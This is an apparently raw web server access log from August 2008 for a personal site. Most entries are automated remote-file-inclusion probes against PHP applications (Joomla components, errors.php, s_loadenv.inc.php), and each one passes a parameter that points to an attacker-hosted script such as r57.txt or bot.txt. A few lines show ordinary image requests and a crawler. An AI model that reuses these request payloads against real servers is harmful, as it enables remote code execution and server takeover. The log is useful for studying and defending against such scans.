69.16.207.46 - - [22/Aug/2008:02:52:43 -0500] "GET /logs/access_log.1205366400/content/multithumb/multithumb?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
201.17.129.24 - - [22/Aug/2008:02:52:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
201.17.129.24 - - [22/Aug/2008:02:52:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
84.132.162.83 - - [22/Aug/2008:02:53:17 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 9113 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:17 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 8315 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:19 -0500] "GET /rachel%20study/rachel-11a.jpg HTTP/1.1" 206 40375 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:20 -0500] "GET /rachel%20study/rachel-11b.jpg HTTP/1.1" 200 45696 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:20 -0500] "GET /rachel%20study/rachel-12.jpg HTTP/1.1" 206 43716 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:20 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:21 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:21 -0500] "GET /rachel%20study/rachel-12a1.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:21 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:21 -0500] "GET /rachel%20study/rachel-12b.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:27 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 160323 "http://de.images.search.yahoo.com/search/images/view?frame=top&back=http%3A%2F%2Fde.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Drachel%2Bpregnant%26ni%3D20%26ei%3DUTF-8%26fr%3Dmoz2%26xargs%3D0%26pstart%3D1%26b%3D561&w=921&h=590&imgurl=tomdolan.pconline.com%2Frachel%2520study%2Frachel-04a.jpg&rurl=http%3A%2F%2Ftomdolan.pconline.com%2Frachel%2520study&size=216.2kB&name=rachel-04a.jpg&p=rachel+pregnant&type=JPG&no=561&tt=1.285&sigr=11b9h03jl&sigi=11jlkr9ce&sigb=13fu3bbo7""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:33 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 50490 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-11a.jpg HTTP/1.1" 206 27152 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-12.jpg HTTP/1.1" 206 33213 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-11b.jpg HTTP/1.1" 206 35141 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-12a1.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-12b.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:53:34 -0500] "GET /rachel%20study/rachel-12c.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
220.73.137.93 - - [22/Aug/2008:02:54:17 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:54:17 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:54:18 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
81.115.165.75 - - [22/Aug/2008:02:54:25 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.115.165.75 - - [22/Aug/2008:02:54:25 -0500] "GET /errors.php?error=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.115.165.75 - - [22/Aug/2008:02:54:25 -0500] "GET /logs/errors.php?error=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
220.73.137.93 - - [22/Aug/2008:02:54:29 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:54:30 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:02:54:31 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
67.236.143.248 - - [22/Aug/2008:02:57:34 -0500] "GET /logs/access_log.1202601600/index.php?pageurl=http://www.freewebs.com/dopeslave/ID.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
67.236.143.248 - - [22/Aug/2008:02:57:34 -0500] "GET /index.php?pageurl=http://www.freewebs.com/dopeslave/ID.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
67.236.143.248 - - [22/Aug/2008:02:57:34 -0500] "GET /logs/index.php?pageurl=http://www.freewebs.com/dopeslave/ID.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
77.232.68.10 - - [22/Aug/2008:02:58:34 -0500] "GET /logs/access_log.1208736000/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.130.79.78 - - [22/Aug/2008:02:59:18 -0500] "GET ///vwar/backup/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:02:59:18 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:02:59:18 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:02:59:27 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
195.149.115.2 - - [22/Aug/2008:03:00:50 -0500] "GET /logs/?sourcedir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 96216 "-""libwww-perl/5.79"
195.149.115.2 - - [22/Aug/2008:03:00:50 -0500] "GET /?sourcedir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
67.236.143.248 - - [22/Aug/2008:03:02:39 -0500] "GET /logs/access_log.1201824000/index.php?pageurl=http://www.freewebs.com/dopeslave/ID.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
218.189.215.153 - - [22/Aug/2008:03:03:44 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 318 "-""libwww-perl/5.805"
218.189.215.153 - - [22/Aug/2008:03:03:45 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 313 "-""libwww-perl/5.805"
201.130.79.78 - - [22/Aug/2008:03:05:16 -0500] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:05:16 -0500] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.36.235.202 - - [22/Aug/2008:03:05:23 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.rcbaleares.com//media/Helvetica?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
72.36.235.202 - - [22/Aug/2008:03:05:23 -0500] "GET /logs/errors.php?error=http://www.rcbaleares.com//media/Helvetica?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
69.64.34.172 - - [22/Aug/2008:03:07:16 -0500] "GET /logs/errors.php?error=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.64.34.172 - - [22/Aug/2008:03:07:16 -0500] "GET /errors.php?error=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.70.83.4 - - [22/Aug/2008:03:08:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
202.70.83.4 - - [22/Aug/2008:03:08:33 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:09:21 -0500] "GET ///vwar/backup/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
81.115.165.75 - - [22/Aug/2008:03:10:27 -0500] "GET /logs/access_log.1208736000/errors.php?error=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
74.52.99.98 - - [22/Aug/2008:03:10:48 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:03:10:49 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
201.130.79.78 - - [22/Aug/2008:03:11:15 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:11:15 -0500] "GET ///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:11:16 -0500] "GET /logs///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.111.176.64 - - [22/Aug/2008:03:11:52 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
87.106.77.242 - - [22/Aug/2008:03:12:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:12:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:12:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:12:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:12:30 -0500] "GET /logs/errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:12:30 -0500] "GET /errors.php?error=http://www.kubanstroicolor.ru/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
201.130.79.78 - - [22/Aug/2008:03:12:31 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
193.178.147.89 - - [22/Aug/2008:03:13:13 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
193.178.147.89 - - [22/Aug/2008:03:13:13 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
193.178.147.89 - - [22/Aug/2008:03:13:13 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
82.194.76.177 - - [22/Aug/2008:03:14:31 -0500] "GET //errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 295 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
82.194.76.177 - - [22/Aug/2008:03:14:31 -0500] "GET /logs//errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 300 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
74.52.139.226 - - [22/Aug/2008:03:15:10 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
74.52.139.226 - - [22/Aug/2008:03:15:11 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
220.73.137.93 - - [22/Aug/2008:03:15:22 -0500] "GET /logs/access_log.1214524800/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
220.73.137.93 - - [22/Aug/2008:03:15:23 -0500] "GET /logs/access_log.1214524800/admin/editor2/errors.php?error=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
193.251.3.239 - - [22/Aug/2008:03:16:12 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Biglotron/Nutch-1.0 (V 3.01; gesnault@geniproj.com)"
193.251.3.239 - - [22/Aug/2008:03:16:12 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Biglotron/Nutch-1.0 (V 3.01; gesnault@geniproj.com)"
216.180.241.37 - - [22/Aug/2008:03:17:08 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
209.126.254.80 - - [22/Aug/2008:03:19:30 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
209.126.254.80 - - [22/Aug/2008:03:19:30 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
91.121.143.183 - - [22/Aug/2008:03:21:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
91.121.143.183 - - [22/Aug/2008:03:21:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
74.52.139.226 - - [22/Aug/2008:03:22:41 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
195.238.172.13 - - [22/Aug/2008:03:22:54 -0500] "GET /logs/contenido.php?sec=? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
195.238.172.13 - - [22/Aug/2008:03:22:54 -0500] "GET /contenido.php?sec=? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
87.106.77.242 - - [22/Aug/2008:03:24:20 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:24:20 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:24:21 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:24:21 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:24:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:24:22 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
69.16.207.46 - - [22/Aug/2008:03:25:31 -0500] "GET /logs/index.php?option=com_virtuemart&page=&category_id=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
69.16.207.46 - - [22/Aug/2008:03:25:31 -0500] "GET /index.php?option=com_virtuemart&page=&category_id=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
74.52.66.242 - - [22/Aug/2008:03:25:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:03:25:33 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
89.111.176.64 - - [22/Aug/2008:03:26:47 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.111.176.64 - - [22/Aug/2008:03:26:47 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
151.11.24.250 - - [22/Aug/2008:03:28:41 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
151.11.24.250 - - [22/Aug/2008:03:28:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
89.208.43.121 - - [22/Aug/2008:03:28:59 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:03:29:00 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:03:29:04 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.55.136.66 - - [22/Aug/2008:03:29:05 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.52.66.242 - - [22/Aug/2008:03:29:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
74.52.66.242 - - [22/Aug/2008:03:29:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bl4ckb0t.co.cc/file/r57.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
62.87.154.41 - - [22/Aug/2008:03:29:53 -0500] "GET /logs/access_log.1206230400//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
62.87.154.41 - - [22/Aug/2008:03:29:54 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
62.87.154.41 - - [22/Aug/2008:03:29:54 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
85.159.91.143 - - [22/Aug/2008:03:30:03 -0500] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:30:03 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
62.87.154.41 - - [22/Aug/2008:03:30:04 -0500] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
85.159.91.143 - - [22/Aug/2008:03:30:04 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
62.87.154.41 - - [22/Aug/2008:03:30:04 -0500] "GET //ashnews.php?pathtoashnews=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
85.159.91.143 - - [22/Aug/2008:03:30:07 -0500] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:30:07 -0500] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:03:30:07 -0500] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
62.87.154.41 - - [22/Aug/2008:03:30:41 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
62.87.154.41 - - [22/Aug/2008:03:30:41 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/fahmyakbar.com/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.208.43.121 - - [22/Aug/2008:03:30:44 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:03:30:44 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.208.43.121 - - [22/Aug/2008:03:30:44 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.77.242 - - [22/Aug/2008:03:32:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:32:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
87.106.77.242 - - [22/Aug/2008:03:32:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
